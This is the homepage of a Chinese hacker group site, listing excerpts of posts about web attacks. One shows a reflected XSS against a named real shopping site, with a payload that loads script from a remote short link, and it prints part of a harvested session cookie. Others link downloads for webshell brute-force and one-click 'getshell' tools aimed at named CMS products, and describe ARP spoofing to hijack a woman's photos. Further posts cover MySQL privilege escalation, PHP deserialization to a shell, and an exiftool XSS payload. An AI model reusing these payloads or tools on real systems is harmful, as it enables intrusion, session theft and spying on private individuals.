中国红客帝国官方网站
    24小时排行
  • 最新
  • 热门
  • 冷门
  • 随机

置顶推荐

      红客帝国是当前国内为数不多的民间网络信息安全研究团队之一。作为专业的安全技术交流平台,红客帝国何盈利与商业性质,本着“低调求发展”的理念、在严格遵守国家法律的前提下低调和谐健康发展,其浓厚的讨论氛围,广泛的研究范围,令不少安全爱好者神往! 红客帝国严格控制团队成员的加入,目前活跃在红客帝国里的成员大多是国内各大互联网公司、各大网络安全公司的网络安全工程师,以及国内各大院校的对网络安全感兴趣的大学生。大家团结在红客帝国共同提高,实现自己的理想。     红客帝国欢迎您的加入! 任何事项请联系官方邮箱:[email protected](官方邮箱申请联系QQ:303404076)   ...

最近更新

红客帝国欢迎你的加入

  红客帝国是当前国内为数不多的民间网络信息安全研究团队之一。作为专业的安全技术交流平台,红客帝国何盈利与商业性质,本着“低调求发展”的理念、在严格遵守国家法律的前提下低调和谐健康发展,其浓厚的讨论氛围,广泛的研究范围,令不少安全爱好者神往! 红客帝国严格控制团队成员的加入,目前活跃在红客帝国里的成员大多是国内各大互联网公司、各大网络安全公司的网络安全工程师,以及国内各大院校的对网络安全感兴趣的大学生。大家团结在红客帝国共同提高,实现自己的理想。     红客帝国欢迎您的加入! 任何事项请联系官方邮箱:[email protected](官方邮箱申请联系QQ:303404076)   官方群: 234116828

2015-3-16 21:22 Monday Comments:2
蘑菇街一处xss直接打cookie

漏洞详情: http://ai.mogujie.com/search/1/pop?minPrice=1&maxPrice=1 minPrice=1 地址http://ai.mogujie.com/search/1/pop?minPrice=%3Cscript%20src=http://t.cn/Rts28iE%3E%3C/script%3E&maxPrice=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E然后再稀松平常的插入  然后效果就出来了 可以反射 这是我反射出来的cookie :__mgjuuid=9709a8c1-4f1c-05a5-cc65-50c1a46907c2; FRMS_FINGERPRINT=1291502f1bd97b0e7d8000919690eac8f2033f041411...

2016-9-11 10:18 Sunday Comments:0
一句话木马爆破工具

一句话木马爆破工具 由无忧亲自编写的 简单而强悍 比一般的速率还快 下载地址https://pan.baidu.com/s/1nuBqZ3r

2016-9-9 17:27 Friday Comments:0
南北科技通用建站程序一键getshell工具

南北科技通用建站程序一键getshell工具 由无忧编写的一款强悍批量 下载地址https://pan.baidu.com/s/1bpyuzC

2016-9-9 17:24 Friday Comments:0
乐尚商城开源程序一键getshell工具

这是一款开源软件 乐尚商城开源程序一键getshell工具 简单而强悍 下载地址https://pan.baidu.com/s/1b2PWj

2016-9-9 17:20 Friday Comments:0
MYSQL提权总结

最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof提权 前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件: 方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。 方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方...

2016-8-16 11:20 Tuesday Comments:0
kali linux :看我是如何劫持目标妹子相册的

首先打开终端,输入流量转发命令,如图。 然后输入arp断网攻击,检测一下是否断网,如果没断网的话,证明已经转发成功,如图 最后新建终端,打开获取网卡图片的命令,劫持成功!如图。 如果看不懂的话,我这里有三套教程,都是自己录的,可以看一下,全部语音讲解,链接如下 链接:http://pan.baidu.com/s/1c2FlM9M 密码:s7pz      第一课 链接:http://pan.baidu.com/s/1slclEOH 密码:mpk1      第二课 链接:http://pan.baidu.com/s/1minlmYW 密码:awyn    第三课 by:小风。qq:2596666199

2016-8-11 17:47 Thursday Comments:0
大话数据库SQL注入的N种姿势

一. 背景 数据库凭借其强大的数据存储能力和卓越的数据处理性能,在各行各业的信息化建设中发挥着关键的作用。随着数据库在各行业的大规模应用,数据泄露事件也频繁发生,这就使数据库安全问题也日益凸显,逐渐变成用户越来越担心的问题。虽然数据库厂商已经做了许多有效的措施来尽量解决数据库存在的安全问题,但至今为止数据库的安全漏洞仍然不断增加。下图为近5年数据库漏洞数量图。   在数据库漏洞中最为常见的漏洞类型是SQL注入漏洞。数据库安全专家结合多年的实践结果总结出了数据库注入的分类分享给大家,以便大家对SQL注入型漏洞有一个更加全面的了解。 SQL注入漏洞不仅出现在WEB端,也出现在数据库的自定义或标准库的存储过程、函数、触发器中。数据库自身的SQL注入漏洞比WEB端的注入漏洞对数据库的威胁性更大。本文对SQL注入的分类是从数据库的角度...

2016-8-8 13:41 Monday Comments:0
PHP序列化/对象注入漏洞的利用

本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell。如果你想了解更多关于PHP序列化的内容,请访问这个链接。如果你想自行测试这个漏洞,你可以通过XVWA和Kevgir进行操作。 漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化。为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在这里。它会被动检测PHP和Java序列化的存在。 分析 我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞。需要注意的是,序列化对象是从参数“r”取来的: $var1=unserialize($_REQUEST['r']); 然后再进行反序列化和eval: eval($this->inject); 接着,执行: echo "<br/>"....

2016-8-8 13:40 Monday Comments:0
如何利用文件上传执行XSS?

利用文件上传实现XSS攻击是一个Hacking Web应用的很好机会,特别是无处不在的用户头像上传案例中,这就给予我们很多发现开发者错误的机会。基本的文件上传 XSS 攻击有以下几种。 1) 文件名 文件名本身可能就是网页的一部分可以造成反射,所以可以通过将 XSS 语句插入文件名中来触发反射。 尽管不是有意为之,但是这个 XSS 可以实践在 W3Schools。 2) 元数据 使用 exiftool 工具可以修改 EXIF 元数据,从而在某些地方造成反射: $ exiftool -FIELD=XSS FILE 例子: $ exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ brute.jpeg 3) 内容 如果 Web 应用允许上...

2016-8-8 13:38 Monday Comments:0
被动式Web扫描器的技术实现

使用场景 在特定的情况下对单个页面进行SQL注入,XSS等漏洞进行渗透检测。例如,需要验证http://www.example.com/query.php?id=1&uname=7ym0n,中的GET参数和POST表单。HTML代码如下: <html> <head> <meta charset="utf-8"> <title>我是一个测试</title> <base href="/"> <meta name="description" content="测试被动式扫描"> </head> <body> <form action="/" id="check_post" method="POST"> <input type="text" value=...

2016-8-8 13:35 Monday Comments:0
OAuth 2.0攻击面与案例总结

本文以两种广泛使用的方案为标准展开.。如对流程不了解,请先移步学习: 理解OAuth 2.0 Authorization Code response_type = code redirect_uri scope client_id state Implicit response_type = token redirect_uri scope client_id state 攻击面 CSRF导致绑定劫持 redirect_uri绕过导致授权劫持 scope越权访问 绑定劫持 攻击者抓取...

2016-8-8 13:25 Monday Comments:0
1 2 3 4 5 6 ... »
Power By H.E.C
    179.10ms